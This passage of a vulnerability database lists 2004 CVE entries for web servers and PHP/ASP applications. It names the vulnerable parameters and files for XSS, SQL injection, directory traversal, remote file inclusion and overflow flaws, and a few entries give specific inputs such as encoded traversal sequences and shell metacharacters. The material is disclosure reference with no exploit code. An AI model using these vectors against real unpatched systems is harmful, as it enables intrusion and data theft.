Application Server 7 Update 4 and earlier, allows remote attackers to cause a denial of service (crash) via a malformed client certificate. [CVE-2004-2214] Mbedthis AppWeb HTTP server before 1.1.3 allows remote attackers to bypass access restrictions via a URI with mixed case characters. [CVE-2004-2213] Mbedthis AppWeb HTTP server before 1.1.3 allows remote attackers to obtain the source code for scripts via a (1) trailing dot (".") or (2) trailing space in an HTTP request. [CVE-2004-2211] Cross-site scripting (XSS) vulnerability in AliveSites Forums 2.0 allows remote attackers to inject arbitrary web script or HTML via the (1) forum_id, (2) method, or (3) forum_title parameters to post.asp, (4) the forum_title parameter to forum.asp, or (5) the id parameter to post.asp. [CVE-2004-2210] Multiple cross-site scripting (XSS) vulnerabilities in Express-Web Content Management System (CMS) allow remote attackers to steal cookie-based authentication information and possibly perform other exploits via the (1) n, (2) b, (3) e, or (4) a parameters to default.asp, (5) the Referer header in an HTTP request to login.asp, or (6) the email parameter to subscribe/default.asp. [CVE-2004-2207] Cross-site scripting (XSS) vulnerability in Ideal Science IdealBB 1.4.9 through 1.5.3 allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2004-2203] Ansel 1.2 through 2.0 uses insecure default permissions, which allows remote attackers to gain access to web readable directories. [CVE-2004-2200] Cross-site scripting (XSS) vulnerability in DUware DUforum 3.0 through 3.1 allows remote attackers to inject arbitrary web script or HTML via via the message text. [CVE-2004-2199] Cross-site scripting (XSS) vulnerability in DUware DUclassified 4.0 allows remote attackers to inject arbitrary web script or HTML via the message text. [CVE-2004-2196] Zanfi CMS lite 1.1 allows remote attackers to obtain the full path of the web server via direct requests without required arguments to (1) adm_pages.php, (2) corr_pages.php, (3) del_block.php, (4) del_page.php, (5) footer.php, (6) home.php, and others. [CVE-2004-2193] Cross-site scripting (XSS) vulnerability in trade.php for CJOverkill 4.0.3 allows remote attackers to inject arbitrary web script or HTML via the (1) tms[0] or (2) url parameters. [CVE-2004-2191] Cross-site scripting (XSS) vulnerability in ttt-webmaster.php in Turbo Traffic Trader PHP 1.0 allows remote attackers to inject arbitrary web script or HTML via the (1) msg[0] or (2) siteurl parameters. [CVE-2004-2188] Cross-site scripting (XSS) vulnerability in DMXReady Site Chassis Manager allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2004-2180] Multiple cross-site scripting (XSS) vulnerabilities in WowBB Forum 1.61 allow remote attackers to inject arbitrary web script or HTML via the (1) country parameter to view_user.php, (2) show parameter to view_forum.php, (3) letter parameter to view_user.php, (4) highlight parameter to view_topic.php, (5) show parameter to index.php, (6) q parameter to search.php, (7) Referer header to admin.php, or the (8) user_email parameter to login.php. [CVE-2004-2178] SQL injection vulnerability in DevoyBB Web Forum 1.0.0 allows remote attackers to execute arbitrary SQL commands via unknown vectors. [CVE-2004-2177] Cross-site scripting (XSS) vulnerability in DevoyBB Web Forum 1.0.0 allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2004-2171] Cross-site scripting (XSS) vulnerability in Cherokee before 0.4.8 allows remote attackers to inject arbitrary web script or HTML via the URL, which is not properly quoted in the resulting error page. [CVE-2004-2162] Multiple cross-site scripting (XSS) vulnerabilities in TUTOS 1.1 allow remote attackers to inject arbitrary web script or HTML via (1) the search field of the Address Module or (2) the t parameter to app_new.php. [CVE-2004-2152] Cross-site scripting (XSS) vulnerability in 'raw' page output mode for MediaWiki 1.3.4 and earlier allows remote attackers to inject arbitrary web script or HTML. [CVE-2004-2138] Cross-site scripting (XSS) vulnerability in AWSguest.php in AllWebScripts MySQLGuest allows remote attackers to inject arbitrary HTML and PHP code via the (1) Name, (2) Email, (3) Homepage or (4) Comments field. [CVE-2004-2128] Cross-site scripting (XSS) vulnerability in BRS WebWeaver 1.07 allows remote attackers to execute arbitrary script as other users via the query string to ISAPISkeleton.dll. [CVE-2004-2127] Directory traversal vulnerability in Web Blog 1.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the file variable. [CVE-2004-2123] Multiple cross-site scripting (XSS) vulnerabilities in Nextplace.com E-Commerce ASP Engine allow remote attackers to inject arbitrary web script or HTML via the (1) level parameter of productdetail.asp, (2) searchKey parameter of searchresults.asp, and possibly (3) level parameter of ListCategories.asp. [CVE-2004-2122] Cross-site scripting (XSS) vulnerability in intraforum_db.cgi in Intra Forum allows remote attackers to inject arbitrary web script or HTML via the (1) use_last_read or (2) forum parameters. [CVE-2004-2121] Multiple directory traversal vulnerabilities in Borland Web Server (BWS) 1.0b3 and earlier allow remote attackers to read and download arbitrary files via (1) multi-dot "......" sequences, or (2) "%5c%2e%2e" (encoded "\..") sequences, in the URL. [CVE-2004-2120] Reptile Web Server allows remote attackers to cause a denial of service (CPU consumption) via multiple incomplete GET requests without the HTTP version. [CVE-2004-2119] Cross-site scripting (XSS) vulnerability in Tiny Server 1.1 allows remote attackers to inject arbitrary web script or HTML via the URL. [CVE-2004-2113] Cross-site scripting (XSS) vulnerability in BremsServer 1.2.4 allows remote attackers to inject arbitrary web script or HTML via the URL. [CVE-2004-2106] Novell NetWare Enterprise Web Server 5.1 and 6.0 allows remote attackers to list directories via a direct request to (1) /com/, (2) /com/novell/, (3) /com/novell/webaccess, or (4) /ns-icons/. [CVE-2004-2105] The webacc servlet in Novell NetWare Enterprise Web Server 5.1 and 6.0 allows remote attackers to read arbitrary .htt files via a full pathname in the error parameter. [CVE-2004-2104] Novell NetWare Enterprise Web Server 5.1 and 6.0 allows remote attackers to obtain sensitive server information, including the internal IP address, via a direct request to (1) snoop.jsp, (2) SnoopServlet, (3) env.bas, or (4) lcgitest.nlm. [CVE-2004-2103] Cross-site scripting (XSS) vulnerability in Novell NetWare Enterprise Web Server 5.1 and 6.0 allows remote attackers to process arbitrary script or HTML as other users via (1) a malformed request for a Perl program with script in the filename, (2) the User.id parameter to the webacc servlet, (3) the GWAP.version parameter to webacc, or (4) a URL request for a .bas file with script in the filename. [CVE-2004-2102] Cross-site scripting (XSS) vulnerability in FREESCO 2.05, a modified version of thttpd, allows remote attackers to inject arbitrary web script or HTML via the test parameter. [CVE-2004-2094] Cross-site scripting (XSS) vulnerability in WebcamXP 1.06.945 allows remote attackers to inject arbitrary HTML or web script as other users via a URL that contains the script. [CVE-2004-2085] Multiple cross-site scripting (XSS) vulnerabilities in Brad Fears phpCodeCabinet 0.4 and earlier allow remote attackers to inject arbitrary web script or HTML via multiple parameters, including (1) the sid parameter to comments.php, (2) the cid, cf, or rfd parameters to category.php, or the cid parameter to (3) input.php, (4) browse.php, (5) themes/facade/header.php, or (6) themes/phpcc/header.php. [CVE-2004-2084] Cross-site scripting (XSS) vulnerability in search.php in JShop E-Commerce Server allows remote attackers to inject arbitrary web script or HTML via the xSearch parameter. [CVE-2004-2083] Opera Web Browser 7.0 through 7.23 allows remote attackers to trick users into executing a malicious file by embedding a CLSID in the file name, which causes the malicious file to appear as a trusted file type, aka "File Download Extension Spoofing." [CVE-2004-2076] Cross-site scripting (XSS) vulnerability in search.php for Jelsoft vBulletin 3.0.0 RC4 allows remote attackers to inject arbitrary web script or HTML via the query parameter. [CVE-2004-2064] Cross-site scripting (XSS) vulnerability in lostBook 1.1 and earlier allows remote attackers to inject arbitrary web script via the (1) Email or (2) Website fields. [CVE-2004-2063] Cross-site scripting (XSS) vulnerability in antiboard.php in AntiBoard 0.7.2 and earlier allows remote attackers to inject arbitrary HTML or web script via the feedback parameter. [CVE-2004-2060] ASPRunner 2.4 stores the database under the web root in the db directory, which may allow remote attackers to obtain the database via a direct request to the database filename, which is predictable based on table and field names. [CVE-2004-2059] Multiple cross-site scripting vulnerabilities in ASPRunner 2.4 allow remote attackers inject arbitrary web script or HTML via the (1) SearchFor parameter in [TABLE-NAME]_search.asp, (2) SQL parameter in [TABLE-NAME]_edit.asp, (3) SearchFor parameter in [TABLE]_list.asp, or (4) SQL parameter in export.asp. [CVE-2004-2055] Cross-site scripting (XSS) vulnerability in search.php for PhpBB 2.0.4 and 2.0.9 allows remote attackers to inject arbitrary HTMl or web script via the search_author parameter. [CVE-2004-2047] Directory traversal vulnerability in EasyWeb FileManager 1.0 RC-1 for PostNuke allows remote attackers to retrieve arbitrary files via a .. (dot dot) in the pathext parameter. [CVE-2004-2045] The HTTP administration interface on Conceptronic CADSLR1 ADSL router running firmware 3.04n allows remote attackers to cause a denial of service (device reboot) via an HTTP request with a long username. [CVE-2004-2041] PHP remote file inclusion vulnerability in secure_img_render.php in e107 0.615 allows remote attackers to execute arbitrary PHP code by modifying the p parameter to reference a URL on a remote web server that contains the code. [CVE-2004-2040] Multiple cross-site scripting (XSS) vulnerabilities in e107 0.615 allow remote attackers to inject arbitrary web script or HTML via the (1) LAN_407 parameter to clock_menu.php, (2) "email article to a friend" field, (3) "submit news" field, or (4) avmsg parameter to usersettings.php. [CVE-2004-2038] Cross-site scripting (XSS) vulnerability in Land Down Under (LDU) before LDU 700 allows remote attackers to inject arbitrary web script or HTML via a BBcode img tag in (1) functions.php, (2) header.php or (3) auth.inc.php. [CVE-2004-2034] Buffer overflow in the (1) WTHoster and (2) WebDriver modules in WildTangent Web Driver 4.0 allows remote attackers to execute arbitrary code via a long filename. [CVE-2004-2031] Cross-site scripting (XSS) vulnerability in user.php in e107 allows remote attackers to inject arbitrary web script or HTML via the (1) URL, (2) MSN, or (3) AIM fields. [CVE-2004-2030] Multiple cross-site scripting (XSS) vulnerabilities in index.jsp for Liferay before 2.2.0 release 10/1/2004 allow remote attackers to inject arbitrary web script or HTML, as demonstrated using the message subject. [CVE-2004-2028] Cross-site scripting (XSS) vulnerability in stats.php in e107 allows remote attackers to inject arbitrary web script or HTML via the referer parameter to log.php. [CVE-2004-2020] Multiple cross-site scripting (XSS) vulnerabilities in Php-Nuke 6.x through 7.3 allow remote attackers inject arbitrary HTML or web script into the (1) optionbox parameter in the News module, (2) date parameter in the Statistics module, (3) year, month, and month_1 parameters in the Stories_Archive module, (4) mode, order, and thold parameters in the Surveys module, or (5) a SQL statement to index.php, as processed by mainfile.php. [CVE-2004-2019] The WebLinks module in Php-Nuke 6.x through 7.3 allows remote attackers to obtain sensitive information via an invalid show parameter, which displays the full path in a PHP error message. [CVE-2004-2018] PHP remote file inclusion vulnerability in index.php in Php-Nuke 6.x through 7.3 allows remote attackers to execute arbitrary PHP code by modifying the modpath parameter to reference a URL on a remote web server that contains the code. [CVE-2004-2017] Multiple cross-site scripting (XSS) vulnerabilities in Turbo Traffic Trader C (TTT-C) 1.0 allow remote attackers to inject arbitrary HTML or web script, as demonstrated via (1) the link parameter to ttt-out, (2) the X-Forwarded-For header in a GET request to ttt-in, (3) the Referer header in a GET request to ttt-in, or the (4) site name or (5) site URL fields in the main control panel. [CVE-2004-2015] Cross-site scripting (XSS) vulnerability in WebCT Campus Edition allows remote attackers to inject arbitrary HTML or web script via (1) iframe, (2) img, or (3) object tags. [CVE-2004-2010] PHP remote file inclusion vulnerability in index.php in phpShop 0.7.1 and earlier allows remote attackers to execute arbitrary PHP code by modifying the base_dir parameter to reference a URL on a remote web server that contains phpshop.cfg. [CVE-2004-2007] Cross-site scripting (XSS) vulnerability in modules.php in NukeJokes 1.7 and 2 Beta allows remote attackers to inject arbitrary HTML or web script via the (1) cat parameter in a CatView function or (2) jokeid parameter in a JokeView function. [CVE-2004-1999] Cross-site scripting (XSS) vulnerability in the Downloads module in Php-Nuke 6.x through 7.2 allows remote attackers to inject arbitrary HTML and web script via the (1) ttitle or (2) sid parameters to modules.php. [CVE-2004-1996] Cross-site scripting (XSS) vulnerability in Simple Machines Forum (SMF) 1.0 allows remote attackers to inject arbitrary web script via the size tag. [CVE-2004-1993] The patch to the checklogin function in omail.pl for omail webmail 0.98.5 is incomplete, which allows remote attackers to execute arbitrary commands via shell metacharacters such as "`" (backticks) in the password. [CVE-2004-1991] Directory traversal vulnerability in Aldo's Web Server (aweb) 1.5 allows remote attackers to view arbitrary files via a .. (dot dot) in an HTTP GET request. [CVE-2004-1990] Aldo's Web Server (aweb) 1.5 allows remote attackers to gain sensitive information via an arbitrary character, which reveals the full path and the user running the aweb process, possibly due to a malformed request. [CVE-2004-1989] PHP remote file inclusion vulnerability in theme.php in Coppermine Photo Gallery 1.2.2b allows remote attackers to execute arbitrary PHP code by modifying the THEME_DIR parameter to reference a URL on a remote web server that contains user_list_info_box.inc. [CVE-2004-1988] PHP remote file inclusion vulnerability in init.inc.php in Coppermine Photo Gallery 1.2.0 RC4 allows remote attackers to execute arbitrary PHP code by modifying the CPG_M_DIR to reference a URL on a remote web server that contains functions.inc.php. [CVE-2004-1985] Cross-site scripting (XSS) vulnerability in menu.inc.php in Coppermine Photo Gallery 1.2.2b allows remote attackers to inject arbitrary HTML or web script via the CPG_URL parameter. [CVE-2004-1979] Cross-site scripting (XSS) vulnerability in do_search.php in PROPS 0.6.1 allows remote attackers to inject arbitrary HTML or web script via the search_string parameter. [CVE-2004-1978] Cross-site scripting (XSS) vulnerability in help.php in Moodle before 1.3 allows remote attackers to inject arbitrary HTML and web script via the text parameter. [CVE-2004-1975] Cross-site scripting (XSS) vulnerability in the category module in pafiledb.php for paFileDB 3.1 allows remote attackers to inject arbitrary web script or HTML via the id parameter, a vulnerability that is closely related to CVE-2004-1551. [CVE-2004-1973] DiGi Web Server allows remote attackers to cause a denial of service (CPU consumption) via an HTTP GET request that contains a large number of / (slash) characters, which consumes resources when DiGi converts the slashes to \ (backslash) characters. [CVE-2004-1965] Multiple cross-site scripting (XSS) vulnerabilities in Open Bulletin Board (OpenBB) 1.0.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) redirect parameter to member.php, (2) to parameter to myhome.php (3) TID parameter to post.php, or (4) redirect parameter to index.php. [CVE-2004-1964] Cross-site scripting (XSS) vulnerability in nqt.php in Network Query Tool (NQT) 1.6 allows remote attackers to inject arbitrary web script or HTML via the portNum parameter. [CVE-2004-1960] Cross-site scripting (XSS) vulnerability in blocker_query.php in Protector System 1.15b1 allows remote attackers to inject arbitrary web script or HTML via the (1) target or (2) portNum parameters. [CVE-2004-1957] Multiple cross-site scripting (XSS) vulnerabilities in PostNuke 0.726 allows remote attackers to inject arbitrary web script or HTML via the (1) lid and query parameters to the Downloads module, (2) query parameter to the Web_links module, or (3) hlpfile parameter to openwindow.php. [CVE-2004-1956] PostNuke 0.7.2.6 allows remote attackers to gain information via a direct HTTP request to files in the (1) includes/blocks directory, (2) pnadodb directory, (3) NS-NewUser module, (4) NS-Your_Account, (5) NS-LostPassword module, or (6) NS-User module which reveals the path to the web server in a PHP error message. [CVE-2004-1954] Cross-site scripting (XSS) vulnerability in modules.php in phProfession 2.5 allows remote attackers to inject arbitrary web script or HTML via the jcode parameter. [CVE-2004-1946] Format string vulnerability in the PRINT_ERROR function in common.c for Cherokee Web Server 0.4.16 and earlier allows local users to execute arbitrary code via format string specifiers in the -C command line argument. NOTE: it is not clear whether this issue could be exploited remotely, or if Cherokee is running at escalated privileges. Therefore it might not be a vulnerability. [CVE-2004-1941] Fastream NETFile FTP/Web Server 6.5.1.980 allows remote attackers to cause a denial of service via a username that does not exist. [CVE-2004-1939] Cross-site scripting (XSS) vulnerability in Zaep AntiSpam 2.0 allows remote attackers to inject arbitrary web script or HTML via double encoded slashes (%252F) in the key parameter. [CVE-2004-1935] Cross-site scripting (XSS) vulnerability in SCT Campus Pipeline allows remote attackers to inject arbitrary web script or HTML via onload, onmouseover, and other Javascript events in an e-mail attachment. [CVE-2004-1930] Cross-site scripting (XSS) vulnerability in the cookiedecode function in mainfile.php for PHP-Nuke 6.x through 7.2, when themes are used, allows remote attackers to inject arbitrary web script or HTML via a base64-encoded user parameter or cookie. [CVE-2004-1924] Multiple cross-site scripting (XSS) vulnerabilities in Tiki CMS/Groupware (TikiWiki) 1.8.1 and earlier allow remote attackers to inject arbitrary web script or HTML via via the (1) theme parameter to tiki-switch_theme.php, (2) find and priority parameters to messu-mailbox.php, (3) flag, priority, flagval, sort_mode, or find parameters to messu-read.php, (4) articleId parameter to tiki-read_article.php, (5) parentId parameter to tiki-browse_categories.php, (6) comments_threshold parameter to tiki-index.php (7) articleId parameter to tiki-print_article.php, (8) galleryId parameter to tiki-list_file_gallery.php, (9) galleryId parameter to tiki-upload_file.php, (10) faqId parameter to tiki-view_faq.php, (11) chartId parameter to tiki-view_chart.php, or (12) surveyId parameter to tiki-survey_stats_survey.php. [CVE-2004-1923] Tiki CMS/Groupware (TikiWiki) 1.8.1 and earlier allows remote attackers to gain sensitive information via a direct request to (1) banner_click.php, (2) categorize.php, (3) tiki-admin_include_directory.php, (4) tiki-directory_search.php, which reveal the web server path in an error message. [CVE-2004-1913] Cross-site scripting (XSS) vulnerability in modules.php in NukeCalendar 1.1.a, as used in PHP-Nuke, allows remote attackers to inject arbitrary web script or HTML via the eid parameter. [CVE-2004-1911] Cross-site scripting (XSS) vulnerability in AzDGDatingLite 2.1.1 allows remote attackers to inject arbitrary web script or HTML via the (1) l parameter (aka language variable) to index.php or (2) id parameter to view.php. [CVE-2004-1907] The Web Filtering functionality in Kerio Personal Firewall (KPF) 4.0.13 allows remote attackers to cause a denial of service (crash) by sending hex-encoded URLs containing "%13%12%13". [CVE-2004-1899] The administration interface in Monit 1.4 through 4.2 allows remote attackers to cause an off-by-one overflow via a POST that contains 1024 bytes. [CVE-2004-1898] Stack-based buffer overflow in the administration interface in Monit 1.4 through 4.2 allows remote attackers to execute arbitrary code via a long username. [CVE-2004-1897] Administration interface in Monit 1.4 through 4.2 allows remote attackers to cause a denial of service (segmentation fault) by sending a Basic Authentication request without a password, which causes Monit to decrement a null pointer and perform an out-of-bounds read. [CVE-2004-1893] Dreamweaver MX, when "Using Driver On Testing Server" or "Using DSN on Testing Server" is selected, uploads the mmhttpdb.asp script to the web site but does not require authentication, which allows remote attackers to obtain sensitive information and possibly execute arbitrary SQL commands via a direct request to mmhttpdb.asp. [CVE-2004-1892] Stack-based buffer overflow in DecodeBase16 function, as used in the (1) IRC module and (2) web server in eMule 0.42d, allows remote attackers to execute arbitrary code via a long string. [CVE-2004-1888] display.cgi in Aborior Encore WebForum allows remote to execute arbitrary commands via shell metacharacters in the file variable. [CVE-2004-1882] Cross-site scripting (XSS) vulnerability in popuplargeimage.asp in CactuShop 5.x allows remote attackers to inject arbitrary web script or HTML via the strImageTag parameter. [CVE-2004-1879] Cross-site scripting (XSS) vulnerability in PHPKIT 1.6.03 allows allows remote attackers to inject arbitrary web script or HTML via forum messages. [CVE-2004-1875] Multiple cross-site scripting (XSS) vulnerabilities in cPanel 9.1.0-R85 allow remote attackers to inject arbitrary web script or HTML via the (1) email parameter to testfile.html, (2) file parameter to erredit.html, (3) dns parameter to dnslook.html, (4) account parameter to ignorelist.html, (5) account parameter to showlog.html, (6) db parameter to repairdb.html, (7) login parameter to doaddftp.html (8) account parameter to editmsg.htm, or (9) ip parameter to del.html. NOTE: the dnslook.html vector was later reported to exist in cPanel 10. [CVE-2004-1874] Multiple cross-site scripting (XSS) vulnerabilities in (1) deliver.asp and (2) billing.asp in A-CART Pro and A-CART 2.0 allow remote attackers to inject arbitrary web script or HTML via the user information forms. [CVE-2004-1872] Cross-site scripting (XSS) vulnerability in WebCT Campus Edition 4.1.1.5 allows remote attackers to inject arbitrary web script or HTML via the @import URL function in a CSS style tag. [CVE-2004-1871] Multiple cross-site scripting (XSS) vulnerabilities in PhotoPost PHP Pro 4.6.x and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) ppuser, (2) password, (3) stype, (4) perpage, (5) sort, (6) page, (7) si, or (8) cat parameters to showmembers.php, or the (9) photo name, (10) photo description, (11) album name, or (12) album description fields. [CVE-2004-1867] Cross-site scripting (XSS) vulnerability in guest.cgi in Fresh Guest Book allows remote attackers to inject arbitrary web script or HTML via the Name field. [CVE-2004-1865] Cross-site scripting (XSS) vulnerability in the administration panel in bBlog 0.7.2 allows remote authenticated users with superuser privileges to inject arbitrary web script or HTML via a blog name ($blogname). NOTE: if administrators are normally allowed to add HTML by other means, e.g. through Smarty templates, then this issue would not give any additional privileges, and thus would not be considered a vulnerability. [CVE-2004-1863] Multiple cross-site scripting (XSS) vulnerabilities in XMB (aka extreme message board) 1.9 beta (aka Nexus beta) allow remote attackers to inject arbitrary web script or HTML via (1) the u2uheader parameter in editprofile.php, the restrict parameter in (2) member.php, (3) misc.php, and (4) today.php, and (5) an arbitrary parameter in phpinfo.php. [CVE-2004-1862] Multiple cross-site scripting (XSS) vulnerabilities in Extreme Messageboard (XMB) 1.8 SP3 and 1.9 beta allow remote attackers to inject arbitrary web script or HTML via the (1) xmbuser parameter to xmb.php, (2) folder parameter to u2u.php, (3) viewmost, replymost, or latest parameter to stats.php, (4) message or icons parameter to post.php, (5) threadlist, pagelinks, forumlist, navigation, or (6) forumdisplay parameter to forumdisplay.php. [CVE-2004-1859] Directory traversal vulnerability in Trend Micro Interscan Web Viruswall in InterScan VirusWall 3.5x allows remote attackers to read arbitrary files via a .. (dot dot) in the URL. [CVE-2004-1858] HP Web Jetadmin 7.5.2546 allows remote attackers to cause a denial of service (crash) via a malformed request, possibly due to a stricmp() error from an invalid use of the "$" character. [CVE-2004-1857] Directory traversal vulnerability in setinfo.hts in HP Web Jetadmin 7.5.2546 allows remote authenticated attackers to read arbitrary files via a .. (dot dot) in the setinclude parameter. [CVE-2004-1856] devices_update_printer_fw_upload.hts in HP Web JetAdmin 7.5.2546, when no password is set, allows remote attackers to upload arbitrary files to the printer directory. [CVE-2004-1849] Multiple cross-site scripting (XSS) vulnerabilities in cPanel 9.1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) email parameter to dodelautores.html or (2) handle parameter to addhandle.html. [CVE-2004-1845] Multiple cross-site scripting (XSS) vulnerabilities in News Manager Lite 2.5 allow remote attackers to inject arbitrary web script or HTML via the (1) email parameter to comment_add.asp, (2) search parameter to search.asp, or (3) n parameter to category_news_headline.asp. [CVE-2004-1844] Cross-site scripting (XSS) vulnerability in Member Management System 2.1 allows remote attackers to inject arbitrary web script or HTML via (1) the err parameter to error.asp or (2) register.asp. [CVE-2004-1840] Multiple cross-site scripting (XSS) vulnerabilities in MS Analysis module 2.0 for PHP-Nuke allows remote attackers to inject arbitrary web script or HTML via the (1) screen parameter to modules.php, (2) module_name parameter to title.php, (3) sortby parameter to modules.php, or (4) overview parameter to modules.php. [CVE-2004-1838] Directory traversal vulnerability in xweb 1.0 allows remote attackers to download arbitrary files via a .. (dot dot) in the URL. [CVE-2004-1837] Cross-site scripting (XSS) vulnerability in Mod_survey 3.0.x before 3.0.16-pre2 and 3.2.x before 3.2.0-pre4 allows remote attackers to inject arbitrary web script or HTML via the certain survey fields or error messages for malformed query strings. [CVE-2004-1829] Multiple cross-site scripting (XSS) vulnerabilities in error.php in Gijza.net Error Manager 2.1 for PHP-Nuke 6.0 allow remote attackers to inject arbitrary web script or HTML via the (1) pagetitle or (2) error parameters, or (3) certain parameters in the error log. [CVE-2004-1827] Cross-site scripting (XSS) vulnerability in YaBB 1 Gold(SP1.3) and YaBB SE 1.5.1 Final allows remote attackers to inject arbitrary web script via the background:url property in (1) glow or (2) shadow tags. [CVE-2004-1825] Cross-site scripting (XSS) vulnerability in index.php in Mambo Open Source 4.5 stable 1.0.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) return or (2) mos_change_template parameters. [CVE-2004-1824] Cross-site scripting (XSS) vulnerability in Jelsoft vBulletin before 3.0 allows remote attackers to inject arbitrary web script or HTML via the what parameter to memberlist.php. [CVE-2004-1823] Multiple cross-site scripting (XSS) vulnerabilities in Jelsoft vBulletin 2.0 beta 3 through 3.0 can4 allows remote attackers to inject arbitrary web script or HTML via the (1) page parameter to showthread.php or (2) order parameter to forumdisplay.php. [CVE-2004-1822] Multiple cross-site scripting (XSS) vulnerabilities in Phorum 3.1 through 5.0.3 beta allow remote attackers to inject arbitrary web script or HTML via the (1) HTTP_REFERER parameter to login.php, (2) HTTP_REFERER parameter to register.php, or (3) target parameter to profile.php. [CVE-2004-1820] PHP remote file inclusion vulnerability in displaycategory.php in 4nalbum 0.92 for PHP-Nuke 6.5 through 7.0 allows remote attackers to execute arbitrary PHP code by modifying the basepath parameter to reference a URL on a remote web server that contains fileFunctions.php. [CVE-2004-1817] Cross-site scripting (XSS) vulnerability in modules.php in Php-Nuke 7.1.0 allows remote attackers to inject arbitrary web script or HTML via the (1) Your Name field, (2) e-mail field, (3) nicname field, (4) fname parameter, (5) ratenum parameter, or (6) search field. [CVE-2004-1816] Unknown vulnerability in Sun Java System Application Server 7.0 Update 2 and earlier, when a SOAP web service expects an array of objects as an argument, allows remote attackers to cause a denial of service (memory consumption). [CVE-2004-1815] Unknown vulnerability in ColdFusion MX 6.0 and 6.1, and JRun 4.0, when a SOAP web service expects an array of objects as an argument, allows remote attackers to cause a denial of service (memory consumption). [CVE-2004-1811] The SSL HTTP Server in HP Web-enabled Management Software 5.0 through 5.92, with anonymous access enabled, allows remote attackers to compromise the trusted certificates by uploading their own certificates. [CVE-2004-1809] Cross-site scripting (XSS) vulnerability in phpBB 2.0.6d and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) postdays parameter to viewtopic.php or (2) topicdays parameter to viewforum.php. [CVE-2004-1807] Cross-site scripting (XSS) vulnerability in index.cfm in CFWebstore 5.0 allows remote attackers to inject arbitrary web script or HTML via the URL. [CVE-2004-1806] SQL injection vulnerability in index.cfm in CFWebstore 5.0 allows remote attackers to execute SQL commands via the (1) category_id, (2) product_id, or (3) feature_id parameters. [CVE-2004-1802] Chat Anywhere 2.72 and earlier allows remote attackers to hide their IP address by using %00 before the nickname, which causes the IP address to be displayed as $IP$ on the administration web page. [CVE-2004-1801] Directory traversal vulnerability in PWebServer 0.3.3 allows remote attackers to read arbitrary files via a .. (dot dot) in the URL. [CVE-2004-1799] PF in certain OpenBSD versions, when stateful filtering is enabled, does not limit packets for a session to the original interface, which allows remote attackers to bypass intended packet filters via spoofed packets to other interfaces. [CVE-2004-1797] Cross-site scripting (XSS) vulnerability in search.php for FreznoShop 1.3.0 RC1 and earlier allows remote attackers to inject arbitrary web script or HTML via the search parameter. [CVE-2004-1794] Cross-site scripting (XSS) vulnerability in the VCard4J Toolkit allows remote attackers to inject arbitrary web script or HTML via the NICKNAME tag in a vCard. [CVE-2004-1788] ASP-Nuke 1.3 and earlier places user credentials under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information via a direct request to main.mdb. [CVE-2004-1786] PortalApp places user credentials under the web root with insufficient access control, which allows remote attackers to gain access to sensitive information via a direct request to 8275.mdb. [CVE-2004-1784] Buffer overflow in the web server of Webcam Watchdog 3.63 allows remote attackers to execute arbitrary code via a long HTTP GET request. [CVE-2004-1782] athenareg.php in Athena Web Registration allows remote attackers to execute arbitrary commands via shell metacharacters in the pass parameter. [CVE-2004-1779] Cross-site scripting (XSS) vulnerability in board.php for ThWboard before beta 2.84 allows remote attackers to inject arbitrary web script or HTML via the lastvisited parameter. [CVE-2004-1776] Cisco IOS 12.1(3) and 12.1(3)T allows remote attackers to read and modify device configuration data via the cable-docsis read-write community string used by the Data Over Cable Service Interface Specification (DOCSIS) standard. [CVE-2004-1758] BEA WebLogic Server and WebLogic Express version 8.1 up to SP2, 7.0 up to SP4, and 6.1 up to SP6 may store the database username and password for an untargeted JDBC connection pool in plaintext in config.xml, which allows local users to gain privileges. [CVE-2004-1757] BEA WebLogic Server and Express 8.1, SP1 and earlier, stores the administrator password in cleartext in config.xml, which allows local users to gain privileges. [CVE-2004-1756] BEA WebLogic Server and WebLogic Express 8.1 SP2 and earlier, and 7.0 SP4 and earlier, when using 2-way SSL with a custom trust manager, may accept a certificate chain even if the trust manager rejects it, which allows remote attackers to spoof other users or servers. [CVE-2004-1755] The Web Services fat client for BEA WebLogic Server and Express 7.0 SP4 and earlier, when using 2-way SSL and multiple certificates to connect to the same URL, may use the incorrect identity after the first connection, which could allow users to gain privileges. [CVE-2004-1747] Cross-site scripting (XSS) vulnerability in NetworkEverywhere NR041 running firmware 1.2 Release 03 allows remote attackers to inject arbitrary web script or HTML via the DHCP HOSTNAME option. [CVE-2004-1746] Cross-site scripting (XSS) vulnerability in index.php in PHP Code Snippet Library allows remote attackers to inject arbitrary web script or HTML via the (1) cat_select or (2) show parameters. [CVE-2004-1744] Easy File Sharing (EFS) Webserver 1.25 allows remote attackers to cause a denial of service (CPU consumption or crash) via many large HTTP requests. [CVE-2004-1743] Easy File Sharing (EFS) Webserver 1.25 allows remote attackers to view arbitrary files via an HTTP request for the disk_c virtual folder. [CVE-2004-1742] Directory traversal vulnerability in WebAPP 0.9.9 allows remote attackers to view arbitrary files via a .. (dot dot) in the viewcat parameter. [CVE-2004-1738] Cross-site scripting (XSS) vulnerability in page.php in JShop allows remote attackers to inject arbitrary web script or HTML via the xPage parameter. [CVE-2004-1735] Cross-site scripting (XSS) vulnerability in the create list option in Sympa 4.1.x and earlier allows remote authenticated users to inject arbitrary web script or HTML via the description field. [CVE-2004-1734] PHP remote file inclusion vulnerability in Mantis 0.19.0a allows remote attackers to execute arbitrary PHP code by modifying the (1) t_core_path parameter to bug_api.php or (2) t_core_dir parameter to relationship_api.php to reference a URL on a remote web server that contains the code. [CVE-2004-1730] Cross-site scripting (XSS) vulnerability in Mantis bugtracker allows remote attackers to inject arbitrary web script or HTML via (1) the return parameter to login_page.php, (2) e-mail field in signup.php, (3) action parameter to login_select_proj_page.php, or (4) hide_status parameter to view_all_set.php. [CVE-2004-1729] Cross-site scripting (XSS) vulnerability in Nihuo Web Log Analyzer 1.6 allows remote attackers to inject arbitrary web script or HTML via the User-Agent HTTP header. [CVE-2004-1720] The (1) address.html and possibly (2) calendar.html pages in Merak Mail Server 5.2.7 allow remote attackers to gain sensitive information via an invalid HTTP request, which reveals the installation path. NOTE: it is unclear whether the calendar.html is an exposure, since the path is leaked in web logs 